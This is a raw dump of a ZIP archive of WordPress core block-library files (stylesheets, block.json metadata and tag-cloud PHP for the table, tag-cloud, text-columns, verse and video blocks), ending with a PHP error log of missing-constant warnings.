tr,.wp-block-table .has-border-color>*{border-color:inherit}.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{border-top-color:inherit}.wp-block-table table[style*=border-top-color] tr:not(:first-child){border-top-color:currentColor}.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{border-right-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{border-bottom-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){border-bottom-color:currentColor}.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{border-left-color:inherit}.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{border-style:inherit}.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{border-style:inherit;border-width:inherit}PK6[|wtable/theme-rtl.cssnu[.wp-block-table{ margin:0 0 1em; } .wp-block-table td,.wp-block-table th{ word-break:normal; } .wp-block-table figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-table figcaption{ color:hsla(0,0%,100%,.65); }PK6[qHbbtable/editor-rtl.cssnu[.wp-block-table{ margin:0; } .wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{ height:auto; } .wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{ width:auto; } .wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{ word-break:break-word; } .wp-block[data-align=center]>.wp-block-table{ text-align:initial; } .wp-block[data-align=center]>.wp-block-table table{ margin:0 auto; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table td.is-selected,.wp-block-table th.is-selected{ border-color:var(--wp-admin-theme-color); border-style:double; box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{ border:1px solid; } .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-start; display:flex; flex-direction:column; } .blocks-table__placeholder-form.blocks-table__placeholder-form>*{ margin-bottom:8px; } @media (min-width:782px){ .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-end; flex-direction:row; } .blocks-table__placeholder-form.blocks-table__placeholder-form>*{ margin-bottom:0; } } .blocks-table__placeholder-input{ margin-bottom:0; margin-left:8px; width:112px; } .blocks-table__placeholder-input input{ height:36px; }PK6[table/editor-rtl.min.cssnu[.wp-block-table{margin:0}.wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{height:auto}.wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{width:auto}.wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{word-break:break-word}.wp-block[data-align=center]>.wp-block-table{text-align:initial}.wp-block[data-align=center]>.wp-block-table table{margin:0 auto}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table td.is-selected,.wp-block-table th.is-selected{border-color:var(--wp-admin-theme-color);border-style:double;box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{border:1px solid}.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-start;display:flex;flex-direction:column}.blocks-table__placeholder-form.blocks-table__placeholder-form>*{margin-bottom:8px}@media (min-width:782px){.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-end;flex-direction:row}.blocks-table__placeholder-form.blocks-table__placeholder-form>*{margin-bottom:0}}.blocks-table__placeholder-input{margin-bottom:0;margin-left:8px;width:112px}.blocks-table__placeholder-input input{height:36px}PK6[;table/style-rtl.cssnu[.wp-block-table{ overflow-x:auto; } .wp-block-table table{ border-collapse:collapse; width:100%; } .wp-block-table thead{ border-bottom:3px solid; } .wp-block-table tfoot{ border-top:3px solid; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table .has-fixed-layout{ table-layout:fixed; width:100%; } .wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{ word-break:break-word; } .wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{ display:table; width:auto; } .wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{ word-break:break-word; } .wp-block-table .has-subtle-light-gray-background-color{ background-color:#f3f4f5; } .wp-block-table .has-subtle-pale-green-background-color{ background-color:#e9fbe5; } .wp-block-table .has-subtle-pale-blue-background-color{ background-color:#e7f5fe; } .wp-block-table .has-subtle-pale-pink-background-color{ background-color:#fcf0ef; } .wp-block-table.is-style-stripes{ background-color:transparent; border-bottom:1px solid #f0f0f0; border-collapse:inherit; border-spacing:0; } .wp-block-table.is-style-stripes tbody tr:nth-child(odd){ background-color:#f0f0f0; } .wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){ background-color:#f3f4f5; } .wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){ background-color:#e9fbe5; } .wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){ background-color:#e7f5fe; } .wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){ background-color:#fcf0ef; } .wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{ border-color:transparent; } .wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{ border-color:inherit; } .wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{ border-top-color:inherit; } .wp-block-table table[style*=border-top-color] tr:not(:first-child){ border-top-color:currentColor; } .wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{ border-left-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{ border-bottom-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:not(:last-child){ border-bottom-color:currentColor; } .wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{ border-right-color:inherit; } .wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{ border-style:inherit; } .wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{ border-style:inherit; border-width:inherit; }PK6[%table/style.cssnu[.wp-block-table{ overflow-x:auto; } .wp-block-table table{ border-collapse:collapse; width:100%; } .wp-block-table thead{ border-bottom:3px solid; } .wp-block-table tfoot{ border-top:3px solid; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table .has-fixed-layout{ table-layout:fixed; width:100%; } .wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{ word-break:break-word; } .wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{ display:table; width:auto; } .wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{ word-break:break-word; } .wp-block-table .has-subtle-light-gray-background-color{ background-color:#f3f4f5; } .wp-block-table .has-subtle-pale-green-background-color{ background-color:#e9fbe5; } .wp-block-table .has-subtle-pale-blue-background-color{ background-color:#e7f5fe; } .wp-block-table .has-subtle-pale-pink-background-color{ background-color:#fcf0ef; } .wp-block-table.is-style-stripes{ background-color:transparent; border-bottom:1px solid #f0f0f0; border-collapse:inherit; border-spacing:0; } .wp-block-table.is-style-stripes tbody tr:nth-child(odd){ background-color:#f0f0f0; } .wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){ background-color:#f3f4f5; } .wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){ background-color:#e9fbe5; } .wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){ background-color:#e7f5fe; } .wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){ background-color:#fcf0ef; } .wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{ border-color:transparent; } .wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{ border-color:inherit; } .wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{ border-top-color:inherit; } .wp-block-table table[style*=border-top-color] tr:not(:first-child){ border-top-color:currentColor; } .wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{ border-right-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{ border-bottom-color:inherit; } .wp-block-table table[style*=border-bottom-color] tr:not(:last-child){ border-bottom-color:currentColor; } .wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{ border-left-color:inherit; } .wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{ border-style:inherit; } .wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{ border-style:inherit; border-width:inherit; }PK6[z[PDDtag-cloud/block.jsonnu[{ "apiVersion": 2, "name": "core/tag-cloud", "category": "widgets", "attributes": { "taxonomy": { "type": "string", "default": "post_tag" }, "showTagCounts": { "type": "boolean", "default": false } }, "supports": { "html": false, "align": true }, "editorStyle": "wp-block-tag-cloud-editor" } PK6[_7]]tag-cloud/editor.min.cssnu[.wp-block-tag-cloud .wp-block-tag-cloud{border:none;border-radius:inherit;margin:0;padding:0}PK6[L3tag-cloud/style-rtl.min.cssnu[.wp-block-tag-cloud{box-sizing:border-box}.wp-block-tag-cloud.aligncenter{justify-content:center;text-align:center}.wp-block-tag-cloud.alignfull{padding-left:1em;padding-right:1em}.wp-block-tag-cloud a{display:inline-block;margin-left:5px}.wp-block-tag-cloud span{display:inline-block;margin-right:5px;text-decoration:none}.wp-block-tag-cloud.is-style-outline{display:flex;flex-wrap:wrap;gap:1ch}.wp-block-tag-cloud.is-style-outline a{border:1px solid;font-size:unset!important;margin-left:0;padding:1ch 2ch;text-decoration:none!important}PK6[>kktag-cloud/editor.cssnu[.wp-block-tag-cloud .wp-block-tag-cloud{ border:none; border-radius:inherit; margin:0; padding:0; }PK6[-tag-cloud/style.min.cssnu[.wp-block-tag-cloud{box-sizing:border-box}.wp-block-tag-cloud.aligncenter{justify-content:center;text-align:center}.wp-block-tag-cloud.alignfull{padding-left:1em;padding-right:1em}.wp-block-tag-cloud a{display:inline-block;margin-right:5px}.wp-block-tag-cloud span{display:inline-block;margin-left:5px;text-decoration:none}.wp-block-tag-cloud.is-style-outline{display:flex;flex-wrap:wrap;gap:1ch}.wp-block-tag-cloud.is-style-outline a{border:1px solid;font-size:unset!important;margin-right:0;padding:1ch 2ch;text-decoration:none!important}PK6[>kktag-cloud/editor-rtl.cssnu[.wp-block-tag-cloud .wp-block-tag-cloud{ border:none; border-radius:inherit; margin:0; padding:0; }PK6[_7]]tag-cloud/editor-rtl.min.cssnu[.wp-block-tag-cloud .wp-block-tag-cloud{border:none;border-radius:inherit;margin:0;padding:0}PK6[uggtag-cloud/style-rtl.cssnu[.wp-block-tag-cloud{ box-sizing:border-box; } .wp-block-tag-cloud.aligncenter{ justify-content:center; text-align:center; } .wp-block-tag-cloud.alignfull{ padding-left:1em; padding-right:1em; } .wp-block-tag-cloud a{ display:inline-block; margin-left:5px; } .wp-block-tag-cloud span{ display:inline-block; margin-right:5px; text-decoration:none; } .wp-block-tag-cloud.is-style-outline{ display:flex; flex-wrap:wrap; gap:1ch; } .wp-block-tag-cloud.is-style-outline a{ border:1px solid; font-size:unset !important; margin-left:0; padding:1ch 2ch; text-decoration:none !important; }PK6[hhtag-cloud/style.cssnu[.wp-block-tag-cloud{ box-sizing:border-box; } .wp-block-tag-cloud.aligncenter{ justify-content:center; text-align:center; } .wp-block-tag-cloud.alignfull{ padding-left:1em; padding-right:1em; } .wp-block-tag-cloud a{ display:inline-block; margin-right:5px; } .wp-block-tag-cloud span{ display:inline-block; margin-left:5px; text-decoration:none; } .wp-block-tag-cloud.is-style-outline{ display:flex; flex-wrap:wrap; gap:1ch; } .wp-block-tag-cloud.is-style-outline a{ border:1px solid; font-size:unset !important; margin-right:0; padding:1ch 2ch; text-decoration:none !important; }PK6[Xz tag-cloud.phpnu[ false, 'taxonomy' => $attributes['taxonomy'], 'show_count' => $attributes['showTagCounts'], ); $tag_cloud = wp_tag_cloud( $args ); if ( ! $tag_cloud ) { $labels = get_taxonomy_labels( get_taxonomy( $attributes['taxonomy'] ) ); $tag_cloud = esc_html( sprintf( /* translators: %s: taxonomy name */ __( 'Your site doesn’t have any %s, so there’s nothing to display here at the moment.' ), strtolower( $labels->name ) ) ); } $wrapper_attributes = get_block_wrapper_attributes(); return sprintf( '

    %2$s

    ', $wrapper_attributes, $tag_cloud ); } /** * Registers the `core/tag-cloud` block on server. */ function register_block_core_tag_cloud() { register_block_type_from_metadata( __DIR__ . '/tag-cloud', array( 'render_callback' => 'render_block_core_tag_cloud', ) ); } add_action( 'init', 'register_block_core_tag_cloud' ); PK6[X˭text-columns/block.jsonnu[{ "apiVersion": 2, "name": "core/text-columns", "icon": "columns", "category": "design", "attributes": { "content": { "type": "array", "source": "query", "selector": "p", "query": { "children": { "type": "string", "source": "html" } }, "default": [ {}, {} ] }, "columns": { "type": "number", "default": 2 }, "width": { "type": "string" } }, "supports": { "inserter": false }, "editorStyle": "wp-block-text-columns-editor", "style": "wp-block-text-columns" } PK6[ VVtext-columns/editor.min.cssnu[.wp-block-text-columns .block-editor-rich-text__editable:focus{outline:1px solid #ddd}PK6[NW4text-columns/style-rtl.min.cssnu[.wp-block-text-columns,.wp-block-text-columns.aligncenter{display:flex}.wp-block-text-columns .wp-block-column{margin:0 1em;padding:0}.wp-block-text-columns .wp-block-column:first-child{margin-right:0}.wp-block-text-columns .wp-block-column:last-child{margin-left:0}.wp-block-text-columns.columns-2 .wp-block-column{width:50%}.wp-block-text-columns.columns-3 .wp-block-column{width:33.33333%}.wp-block-text-columns.columns-4 .wp-block-column{width:25%}PK6[Z[[text-columns/editor.cssnu[.wp-block-text-columns .block-editor-rich-text__editable:focus{ outline:1px solid #ddd; }PK6[=+text-columns/style.min.cssnu[.wp-block-text-columns,.wp-block-text-columns.aligncenter{display:flex}.wp-block-text-columns .wp-block-column{margin:0 1em;padding:0}.wp-block-text-columns .wp-block-column:first-child{margin-left:0}.wp-block-text-columns .wp-block-column:last-child{margin-right:0}.wp-block-text-columns.columns-2 .wp-block-column{width:50%}.wp-block-text-columns.columns-3 .wp-block-column{width:33.33333%}.wp-block-text-columns.columns-4 .wp-block-column{width:25%}PK6[Z[[text-columns/editor-rtl.cssnu[.wp-block-text-columns .block-editor-rich-text__editable:focus{ outline:1px solid #ddd; }PK6[ VVtext-columns/editor-rtl.min.cssnu[.wp-block-text-columns .block-editor-rich-text__editable:focus{outline:1px solid #ddd}PK6[ϱytext-columns/style-rtl.cssnu[.wp-block-text-columns,.wp-block-text-columns.aligncenter{ display:flex; } .wp-block-text-columns .wp-block-column{ margin:0 1em; padding:0; } .wp-block-text-columns .wp-block-column:first-child{ margin-right:0; } .wp-block-text-columns .wp-block-column:last-child{ margin-left:0; } .wp-block-text-columns.columns-2 .wp-block-column{ width:50%; } .wp-block-text-columns.columns-3 .wp-block-column{ width:33.33333%; } .wp-block-text-columns.columns-4 .wp-block-column{ width:25%; }PK6[text-columns/style.cssnu[.wp-block-text-columns,.wp-block-text-columns.aligncenter{ display:flex; } .wp-block-text-columns .wp-block-column{ margin:0 1em; padding:0; } .wp-block-text-columns .wp-block-column:first-child{ margin-left:0; } .wp-block-text-columns .wp-block-column:last-child{ margin-right:0; } .wp-block-text-columns.columns-2 .wp-block-column{ width:50%; } .wp-block-text-columns.columns-3 .wp-block-column{ width:33.33333%; } .wp-block-text-columns.columns-4 .wp-block-column{ width:25%; }PK6[ήverse/block.jsonnu[{ "apiVersion": 2, "name": "core/verse", "category": "text", "attributes": { "content": { "type": "string", "source": "html", "selector": "pre", "default": "", "__unstablePreserveWhiteSpace": true }, "textAlign": { "type": "string" } }, "supports": { "anchor": true, "__experimentalFontFamily": true, "fontSize": true }, "style": "wp-block-verse", "editorStyle": "wp-block-verse-editor" } PK6[p7eeverse/style-rtl.min.cssnu[pre.wp-block-verse{overflow:auto;white-space:pre-wrap}:where(pre.wp-block-verse){font-family:inherit}PK6[p7eeverse/style.min.cssnu[pre.wp-block-verse{overflow:auto;white-space:pre-wrap}:where(pre.wp-block-verse){font-family:inherit}PK6[}]ttverse/style-rtl.cssnu[pre.wp-block-verse{ overflow:auto; white-space:pre-wrap; } :where(pre.wp-block-verse){ font-family:inherit; }PK6[}]ttverse/style.cssnu[pre.wp-block-verse{ overflow:auto; white-space:pre-wrap; } :where(pre.wp-block-verse){ font-family:inherit; }PK6[yssvideo/block.jsonnu[{ "apiVersion": 2, "name": "core/video", "category": "media", "attributes": { "autoplay": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "autoplay" }, "caption": { "type": "string", "source": "html", "selector": "figcaption" }, "controls": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "controls", "default": true }, "id": { "type": "number" }, "loop": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "loop" }, "muted": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "muted" }, "poster": { "type": "string", "source": "attribute", "selector": "video", "attribute": "poster" }, "preload": { "type": "string", "source": "attribute", "selector": "video", "attribute": "preload", "default": "metadata" }, "src": { "type": "string", "source": "attribute", "selector": "video", "attribute": "src" }, "playsInline": { "type": "boolean", "source": "attribute", "selector": "video", "attribute": "playsinline" }, "tracks": { "type": "array", "items": { "type": "object" }, "default": [] } }, "supports": { "anchor": true, "align": true }, "editorStyle": "wp-block-video-editor", "style": "wp-block-video" } PK6[55video/editor.min.cssnu[.wp-block-video.wp-block-video.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e}.wp-block-video.wp-block-video.is-selected .components-placeholder>svg{opacity:0}.wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-video.wp-block-video.is-selected .components-placeholder:before{opacity:0}.wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{transition:none}.wp-block[data-align=center]>.wp-block-video{text-align:center}.wp-block-video{position:relative}.wp-block-video.is-transient video{opacity:.3}.wp-block-video .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}.editor-video-poster-control .components-base-control__label{display:block}.editor-video-poster-control .components-button{margin-right:8px}.block-library-video-tracks-editor{z-index:159990}.block-library-video-tracks-editor__track-list-track{padding-left:12px}.block-library-video-tracks-editor__single-track-editor-kind-select{max-width:240px}.block-library-video-tracks-editor__single-track-editor-edit-track-label{color:#757575;display:block;font-size:11px;font-weight:500;margin-top:4px;text-transform:uppercase}.block-library-video-tracks-editor>.components-popover__content{padding:0;width:360px}.block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{padding:0}.block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{padding:12px}PK6[o}Pvideo/style-rtl.min.cssnu[.wp-block-video{box-sizing:border-box}.wp-block-video video{vertical-align:middle;width:100%}@supports (position:sticky){.wp-block-video [poster]{object-fit:cover}}.wp-block-video.aligncenter{text-align:center}.wp-block-video figcaption{margin-bottom:1em;margin-top:.5em}PK6[ivideo/theme.cssnu[.wp-block-video figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-video figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-video{ margin:0 0 1em; }PK6[video/theme-rtl.min.cssnu[.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}PK6[g@Zvideo/editor.cssnu[.wp-block-video.wp-block-video.is-selected .components-placeholder{ background-color:#fff; border:none; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; } .wp-block-video.wp-block-video.is-selected .components-placeholder>svg{ opacity:0; } .wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{ display:none; } .wp-block-video.wp-block-video.is-selected .components-placeholder:before{ opacity:0; } .wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{ transition:none; } .wp-block[data-align=center]>.wp-block-video{ text-align:center; } .wp-block-video{ position:relative; } .wp-block-video.is-transient video{ opacity:.3; } .wp-block-video .components-spinner{ left:50%; margin-left:-9px; margin-top:-9px; position:absolute; top:50%; } .editor-video-poster-control .components-base-control__label{ display:block; } .editor-video-poster-control .components-button{ margin-right:8px; } .block-library-video-tracks-editor{ z-index:159990; } .block-library-video-tracks-editor__track-list-track{ padding-left:12px; } .block-library-video-tracks-editor__single-track-editor-kind-select{ max-width:240px; } .block-library-video-tracks-editor__single-track-editor-edit-track-label{ color:#757575; display:block; font-size:11px; font-weight:500; margin-top:4px; text-transform:uppercase; } .block-library-video-tracks-editor>.components-popover__content{ padding:0; width:360px; } .block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{ padding:0; } .block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{ padding:12px; }PK6[video/theme.min.cssnu[.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}PK6[o}Pvideo/style.min.cssnu[.wp-block-video{box-sizing:border-box}.wp-block-video video{vertical-align:middle;width:100%}@supports (position:sticky){.wp-block-video [poster]{object-fit:cover}}.wp-block-video.aligncenter{text-align:center}.wp-block-video figcaption{margin-bottom:1em;margin-top:.5em}PK6[ivideo/theme-rtl.cssnu[.wp-block-video figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-video figcaption{ color:hsla(0,0%,100%,.65); } .wp-block-video{ margin:0 0 1em; }PK6[?Uvideo/editor-rtl.cssnu[.wp-block-video.wp-block-video.is-selected .components-placeholder{ background-color:#fff; border:none; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; } .wp-block-video.wp-block-video.is-selected .components-placeholder>svg{ opacity:0; } .wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{ display:none; } .wp-block-video.wp-block-video.is-selected .components-placeholder:before{ opacity:0; } .wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{ transition:none; } .wp-block[data-align=center]>.wp-block-video{ text-align:center; } .wp-block-video{ position:relative; } .wp-block-video.is-transient video{ opacity:.3; } .wp-block-video .components-spinner{ margin-right:-9px; margin-top:-9px; position:absolute; right:50%; top:50%; } .editor-video-poster-control .components-base-control__label{ display:block; } .editor-video-poster-control .components-button{ margin-left:8px; } .block-library-video-tracks-editor{ z-index:159990; } .block-library-video-tracks-editor__track-list-track{ padding-right:12px; } .block-library-video-tracks-editor__single-track-editor-kind-select{ max-width:240px; } .block-library-video-tracks-editor__single-track-editor-edit-track-label{ color:#757575; display:block; font-size:11px; font-weight:500; margin-top:4px; text-transform:uppercase; } .block-library-video-tracks-editor>.components-popover__content{ padding:0; width:360px; } .block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{ padding:0; } .block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{ padding:12px; }PK6[e77video/editor-rtl.min.cssnu[.wp-block-video.wp-block-video.is-selected .components-placeholder{background-color:#fff;border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e}.wp-block-video.wp-block-video.is-selected .components-placeholder>svg{opacity:0}.wp-block-video.wp-block-video.is-selected .components-placeholder .components-placeholder__illustration{display:none}.wp-block-video.wp-block-video.is-selected .components-placeholder:before{opacity:0}.wp-block-video.wp-block-video .components-button,.wp-block-video.wp-block-video .components-placeholder__instructions,.wp-block-video.wp-block-video .components-placeholder__label{transition:none}.wp-block[data-align=center]>.wp-block-video{text-align:center}.wp-block-video{position:relative}.wp-block-video.is-transient video{opacity:.3}.wp-block-video .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.editor-video-poster-control .components-base-control__label{display:block}.editor-video-poster-control .components-button{margin-left:8px}.block-library-video-tracks-editor{z-index:159990}.block-library-video-tracks-editor__track-list-track{padding-right:12px}.block-library-video-tracks-editor__single-track-editor-kind-select{max-width:240px}.block-library-video-tracks-editor__single-track-editor-edit-track-label{color:#757575;display:block;font-size:11px;font-weight:500;margin-top:4px;text-transform:uppercase}.block-library-video-tracks-editor>.components-popover__content{padding:0;width:360px}.block-library-video-tracks-editor__add-tracks-container .components-menu-group__label,.block-library-video-tracks-editor__track-list .components-menu-group__label{padding:0}.block-library-video-tracks-editor__add-tracks-container,.block-library-video-tracks-editor__single-track-editor,.block-library-video-tracks-editor__track-list{padding:12px}PK6[::video/style-rtl.cssnu[.wp-block-video{ box-sizing:border-box; } .wp-block-video video{ vertical-align:middle; width:100%; } @supports (position:sticky){ .wp-block-video [poster]{ object-fit:cover; } } .wp-block-video.aligncenter{ text-align:center; } .wp-block-video figcaption{ margin-bottom:1em; margin-top:.5em; }PK6[::video/style.cssnu[.wp-block-video{ box-sizing:border-box; } .wp-block-video video{ vertical-align:middle; width:100%; } @supports (position:sticky){ .wp-block-video [poster]{ object-fit:cover; } } .wp-block-video.aligncenter{ text-align:center; } .wp-block-video figcaption{ margin-bottom:1em; margin-top:.5em; }PK6[nn error_lognu[[28-Jun-2021 11:06:00 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jun-2021 11:06:00 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jun-2021 11:06:00 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [28-Jun-2021 11:06:00 UTC] PHP Fatal error: require(): Failed opening required 